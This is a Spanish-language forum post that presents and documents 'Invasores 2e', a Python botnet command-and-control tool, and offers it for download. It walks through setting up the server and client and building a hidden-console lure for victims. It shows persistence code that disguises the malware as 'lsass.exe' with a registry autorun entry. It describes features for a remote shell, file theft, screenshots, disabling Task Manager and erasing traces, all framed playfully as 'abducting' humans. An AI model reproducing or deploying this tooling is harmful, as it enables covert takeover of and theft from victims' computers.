(https://raw.githubusercontent.com/Kirari-Senpai/invasores-2e/master/logos/alien1.png)
Muy buenas a todos! La verdad es que no recuerdo haber escrito un post acá, pero supongo que es la primera vez. :)
Bueno, antes de empezar quiero aclarar que a este proyecto lo deje pausado hace bastante, por lo que puede que falle en algunas ocasiones. Pero aún sigue en fase de desarrollo, desconozco cuando lo seguiré, pero creo que será dentro de poco. ;D
Así que sin más preámbulos, comencemos con lo bueno...
¿Qué es Invasores 2e?Invasores 2e es un servidor de C&C (desarrollado en Python) para armar una botnet simple.
¿Pero por qué le pusiste "Invasores 2e"?Bueno, simplemente el "Invasores", porque quise darle al C&C un toque alienígena, con mensajes, música, etc. Más que un servidor de este tipo, le quise dar un estilo de videojuego, pero ya saben cual es la realidad jaja. En cuanto lo del "2e", es solo porque hice varias versiones, desde la "2a" hasta esta. Y ahora posiblemente haga la "2f" que es con entorno gráfico.
Bien, ahora ¿podés explicarme cómo funciona?Claro, pero primero descarga el programa, lo puedes hacer entrando al siguiente link:
https://github.com/Kirari-Senpai/invasores-2eDe ahí, vas "Clone or Download" y selecciones "Download ZIP".
O puedes también clonar el repositorio:
git clone https://github.com/Kirari-Senpai/invasores-2e.git
cd invasores-2e/
Una vez hecho lo anterior, vamos a instalar las dependencias, hacemos lo siguiente:
pip3 install -r requirements.txt
Puede que el pip varíe según como hayan instalado Python, yo de por sí lo tengo como pip3.
Ahora bien, llega lo bueno.
Configurar el servidorNo hay muchas configuraciones para hacer por ahora en Invasores, por lo que solo se puede configurar lo que es la IP y el puerto del servidor. Para hacerlo:
cd server/core/
Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", por ejemplo, yo lo haré con vim:
vim config.py
Ahí modificaremos las variables IP y PORT con la de nuestra PC, guardamos y listo.
Luego seguimos con el cliente.
Configurar el clientePara el cliente hacemos los mismos pasos que la vez anterior:
cd server/core/
Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", y el resto ya lo saben :)
vim config.py
Ahí modificaremos las variables IP y PORT del servidor, guardamos y listo.
Configuraciones extra para el clienteOtra pequeña configuración es el de la persistencia:
NOMBRE_MALWARE = "lsass.exe" # Acá podrán cambiar el nombre del malware que será copiado para obtener persistencia
RUTA_MALWARE_DESTINO = tempfile.gettempdir() + "\\" + NOMBRE_MALWARE # La ruta donde se copiará el malware. Por defecto, se copiará en los archivos temporales del usuario
NOMBRE_REGISTRO_MALWARE = NOMBRE_MALWARE[:-4] # Nombre que tendrá el registro de autoejecucion del malware. Por defecto lleva el nombre original del programa
Ahora que está todo listo, podremos seguir.
Crear ejecutableAntes de atraer a la víctima, necesitamos crear un señuelo, con el cual atraeremos y controlaremos al capturado. Para esto, hacemos lo siguiente:
pyinstaller --noconsole --onefile client.py
** Dependiendo tu sistema operativo, puede que el ejecutable sea "./client" ó "client.exe"**
** Otra dato, es que si por ejemplo al señuelo lo vás a crear en otro sistema, es que allí también, instales las dependencias, porque el ejecutable traerá problemas. **Bien ahora que aclaramos todo lo de la configuración, podemos seguir con el núcleo.
Comenzar con la invasiónHacemos lo siguiente:
cd server/
python3 invasores.py
Ahora si ¿me puedes explicar cómo funciona o qué hace?Oh cierto! Bueno antes de empezar con la acción, no podemos operar con alguien si no la abducimos, por tanto, se realizará lo siguiente:
Cuando hayamos raptado al individuo, podremos hacer diferentes cosas:
- Manejarlo a nuestro antojo mediante una shell
- Subir y descargar archivos
- Screenshot
- Persistencia
- Autoremoverse
- Deshabilitar administrador de tareas
Técnica de captura de humanos(https://i.ibb.co/8x1GBMK/Screenshot-20200306-165611.png)
Abducción automáticaTus compañeros de nave atraparán terrícolas, sin necesidad de que tu esperes por ellos. En pocas palabras, la tarea para aceptar conexiones, correrá en segundo plano.
Abducción en vivoAccediendo al menú de abducciones, podremos solicitar ver en vivo la captura de humanos.
(https://i.ibb.co/52Q7cyk/Screenshot-20200306-160049.jpg)
LaboratorioVer a los individuos que hayas raptadoDentro del menú laboratorio, simplemente con tipear "listar" podrás ver a todas las personas que hayas capturado en el camino.
(https://i.ibb.co/Hxdrc8d/Screenshot-20200306-161238.jpg)
Manipulación alienígenaPermite tomar el control de un cuerpo en específico para operar. Esto se hace mediante el comando:
manipular <id>
(//)
Asesinar basura humanaUna vez que la persona no te haga más falta, puedes eliminarla de tu lista con el siguiente comando:
matar <id>
(https://i.ibb.co/QYdK1G3/Screenshot-20200306-162026.png)
Módulos para operar con el individuoEstas están disponibles en el menú de "control total", una vez se haya ejecutado el comando de Manipulación alienígena:
ShellDevuelve una shell.
(https://i.ibb.co/0KNGNxD/Screenshot-20200306-162910.jpg)
Subir y descargar archivosClaramente como lo dice el subtitulo, podrás subir cualquier archivo de tú máquina al del equipo víctima. Igualmente vas a poder descargar cualquier archivo del secuestrado.
subir "<Ruta origen completa>" "<Ruta destino completa>"
(https://i.ibb.co/p0QjMsR/Screenshot-20200306-214500.jpg)
descargar "<Ruta origen completa>" "<Ruta destino completa>"
(https://i.ibb.co/P6XXh87/Screenshot-20200306-214925.jpg)
ScreenshotSi quieres pruebas de que la víctima no te engaña, toma capturas de pantalla para corroborar sus acciones.
InstalarsePodrás copiarte en los registros del sistema para obtener persistencia.
RemoverUna vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.
Deshabilitar administrador de tareasLa víctima tratará de librarse de tí, pero no será muy fácil. Podrás deshabilitar el administrador de tareas para evitar que el cierre tu actividad en su interior.
PersistenciaPodrás copiarte en los registros del sistema para obtener persistencia.
AutoremoverUna vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.
(//)
Purga masivaSe hace una limpieza completa en todas las víctimas para no dejar rastros, para posteriormente eliminarlos. Para hacerlo, se utiliza el comando:
destruirlos
(https://i.ibb.co/9sNnvcZ/Screenshot-20200306-165225.jpg)
Próximamente en InvasoresNetcatSi estabas dudando de esto, bueno es cierto, tenemos soporte con Netcat. En el peor de los casos, que nos sintamos inseguros con la shell común, podremos usar el módulo de Netcat para el mismo fin, pero mucho mejor.
KeyloggerGraba cualquier movimiento que la víctima haga mediante pulsaciones en el teclado. Toda la información se registrará en un archivo.
Grabar audioSi quieres mantenerte informado de lo que sucede alrededor del capturado, entonces activa este módulo, para escuchar todos sus movimientos.
Perfecto ¿Y cuáles son los requerimientos?Un sistema operativo basado en Linux. Recomiendo Kali Linux en su última versión 2019.4. Solo ha sido probado en este último, por lo que si lo utiliza en otro sistema, tal vez, podría causarle algún problema.
Para terminarSé que no tiene muchas funcionalidades, pero poco a poco se las iré agregando :D
Y bueno compañeros, eso es todo, a este proyecto aún le falta mucho por mejorar, pero les quería mostrar esta primera parte. Como pudieron apreciar, no es muy difícil de usar, si no saben los comandos, al tipear "ayuda", les mostrará los comandos disponibles. De última, me pueden enviar un msj y trataré de responder a la brevedad. El que quiera aportar es completamente bienvenido. ;) ;)
Saludos a todos!
Kirari-